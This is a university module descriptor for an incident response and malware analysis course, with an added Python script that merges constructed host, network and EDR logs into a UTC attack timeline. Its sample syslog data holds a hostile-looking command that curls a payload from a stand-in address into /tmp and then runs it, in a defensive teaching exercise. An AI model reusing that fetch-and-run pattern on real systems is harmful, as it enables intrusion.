Core Module Information
Module title: Incident Response and Malware Analysis

SCQF level: 10
SCQF credit value: 20.00
ECTS credit value: 10

Module code: CSN10709
Module leader: Thomas Tan
School: School of Computing, Engineering and the Built Environment
Subject area group: Cyber Security and Systems Engineering
Prerequisites

Module code: SET08701
Module title: C++ Programming
Examples of equivalent learning: High-level programming language

Description of module content:

The aim of the module is to develop a deep understanding of advanced areas of security and live/network forensics, with a strong focus on virtualised environments, so that graduates can act professionally in incident response and in malware/threat analysis. The main areas are:
• Threat Timelining. Network and host traces around key threats such as DDoS, malware infection and data loss.
• Host Investigation Evidence Gathering: Windows, Linux, Android and Mac OS.
• System Architectures, Services and Devices. Networked infrastructures (servers/firewall/IDS/syslog).
• Network Protocol Analysis. Advanced Network Protocol Analysis, Advanced Trace Analysis, IDS Signature Detection, and Security Threat Network Traces.
• Log Capture/Analysis and Timelining. Creating large-scale data infrastructure and analysis methods such as big data, SIEM and cross-log analysis.
• Malware Forensics. Code Analysis, Host/Network Analysis, Reverse Engineering. Mobile/x86 architecture, Machine Code Analysis, Vulnerability Analysis and Sandboxed Analysis.
• Malware Analysis. Encoding methods. Static/Dynamic Analysis. Disassembly. Obfuscation. Behaviour Analysis.
• Advanced Malware Analysis. Anti-disassembly, anti-debugging, packers and unpackers, malware launching, malware signatures, and shellcode analysis.
• Data Hiding. Data hiding methods, tunnelling and disk encryption.
• Current Related Research.
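The threat timelining and cross-log analysis items above, as an added example that is not part of the module materials: a small Python script that parses constructed syslog, Zeek-style conn.log and EDR JSON records, normalises every timestamp to UTC, merges them into one ordered timeline, and pulls out the window around a pivot indicator. The year (2024) and UTC sender clock assumed for the syslog lines, the hostnames, and the RFC 5737 test addresses are all assumptions; the log lines are constructed, not real captures.

```python
"""Cross-log threat timelining: merge host and network traces into one UTC
timeline. Added illustration, not module material. All log lines are constructed."""
import json
import re
from datetime import datetime, timedelta, timezone
from typing import List, NamedTuple, Optional


class Event(NamedTuple):
    ts: datetime     # timezone-aware UTC after normalisation
    source: str      # which trace the event came from
    detail: str      # free-text summary used for indicator matching


# Constructed sample traces. Addresses are RFC 5737 documentation ranges.
SYSLOG_LINES = [
    "Mar 14 10:02:11 web01 sshd[2201]: Accepted password for deploy from 203.0.113.7 port 51422 ssh2",
    "Mar 14 10:02:40 web01 sudo: deploy : COMMAND=/usr/bin/curl -o /tmp/.x http://198.51.100.9/x",
]
# Zeek-style conn.log, tab separated: ts (epoch seconds), orig_h, orig_p, resp_h, resp_p, proto
CONN_LINES = [
    "1710410560.120000\t10.0.0.5\t49876\t198.51.100.9\t80\ttcp",
    "1710410590.000000\t10.0.0.5\t49877\t198.51.100.9\t4444\ttcp",
]
# EDR-style JSON export whose ISO-8601 timestamp carries a local UTC offset
EDR_LINES = [
    '{"timestamp": "2024-03-14T06:03:30-04:00", "host": "web01", "event": "process_start", "image": "/tmp/.x"}',
]

SYSLOG_RE = re.compile(r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) (?P<msg>.*)$")


def parse_syslog(line: str, year: int = 2024) -> Event:
    """Classic syslog carries no year and no zone. We assume the sender logged
    in UTC in the given year; an analyst must verify both on the real host."""
    m = SYSLOG_RE.match(line)
    if not m:
        raise ValueError(f"unrecognised syslog line: {line!r}")
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S").replace(tzinfo=timezone.utc)
    return Event(ts, f"host:{m['host']}", m["msg"])


def parse_conn(line: str) -> Event:
    """Zeek timestamps are epoch seconds, so they are UTC by definition."""
    ts_s, src, sport, dst, dport, proto = line.rstrip("\n").split("\t")
    ts = datetime.fromtimestamp(float(ts_s), tz=timezone.utc)
    return Event(ts, "net:conn", f"{src}:{sport} -> {dst}:{dport}/{proto}")


def parse_edr(line: str) -> Event:
    """The offset in the ISO timestamp lets us convert the local time to UTC."""
    rec = json.loads(line)
    ts = datetime.fromisoformat(rec["timestamp"]).astimezone(timezone.utc)
    return Event(ts, f"edr:{rec['host']}", f"{rec['event']} {rec['image']}")


def build_timeline() -> List[Event]:
    events = [parse_syslog(l) for l in SYSLOG_LINES]
    events += [parse_conn(l) for l in CONN_LINES]
    events += [parse_edr(l) for l in EDR_LINES]
    # Sorting is stable, so ties keep their per-source order.
    return sorted(events, key=lambda e: e.ts)


def find_pivot(timeline: List[Event], indicator: str) -> Optional[Event]:
    """First event mentioning the indicator (an IP, path, hash...), or None."""
    return next((e for e in timeline if indicator in e.detail), None)


def window(timeline: List[Event], centre: datetime, before_s: int = 60, after_s: int = 60) -> List[Event]:
    """Events within [centre - before_s, centre + after_s], inclusive."""
    lo, hi = centre - timedelta(seconds=before_s), centre + timedelta(seconds=after_s)
    return [e for e in timeline if lo <= e.ts <= hi]


def render(events: List[Event]) -> List[str]:
    return [f"{e.ts.strftime('%Y-%m-%dT%H:%M:%S.%f')}Z  {e.source:<11} {e.detail}" for e in events]


if __name__ == "__main__":
    tl = build_timeline()
    pivot = find_pivot(tl, "198.51.100.9")
    for row in render(window(tl, pivot.ts)):
        print(row)
```

Run stand-alone, the script prints the merged timeline around the first appearance of the download host: the sudo curl on the host lines up with the conn.log entry to port 80 a tenth of a second later, followed by the outbound connection to port 4444 and the EDR process start of /tmp/.x. The point of the exercise is the normalisation step: until every source is on one clock, the order of these events cannot be trusted.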

Learning Outcomes for module:

LO1: Develop an advanced knowledge of key security/digital forensic principles and methods related to incident response and malware analysis.
LO2: Develop analytical skills related to the key academic principles and practical skills required to understand complex investigations using data from a range of sources, and make informed choices.
LO3: Research, design, implement, evaluate and critically analyse an advanced system to a given set of security and/or digital forensic requirements, with a focus on virtualised environments.

Full Details of Teaching and Assessment
2023/4, Trimester 2, Face-to-Face
Occurrence: 001
Primary mode of delivery: Face-to-Face
Location of delivery: UK PARTNER
Partner:
Member of staff responsible for delivering module: Thomas Tan
Module Organiser:


Student Activity (Notional Equivalent Study Hours (NESH))
Mode of activity | Learning & Teaching Activity | NESH (Study Hours)
Face To Face | Tutorial | 18
Independent Learning | Guided independent study | 182
Total Study Hours: 200
Expected Total Study Hours for Module: 200


Assessment
Type of Assessment | Weighting % | LOs covered | Week due | Length in Hours/Words
Centrally Time Tabled Examination | 25 | 1, 2 | 2 | 1 hour
Centrally Time Tabled Examination | 25 | 1, 2 | 4 | 1 hour
Report | 50 | 3 | 4 | 16 hours
Component 1 subtotal: 100
Component 2 subtotal: 0
Module subtotal: 100

Indicative References and Reading List - URL:
Contact your module leader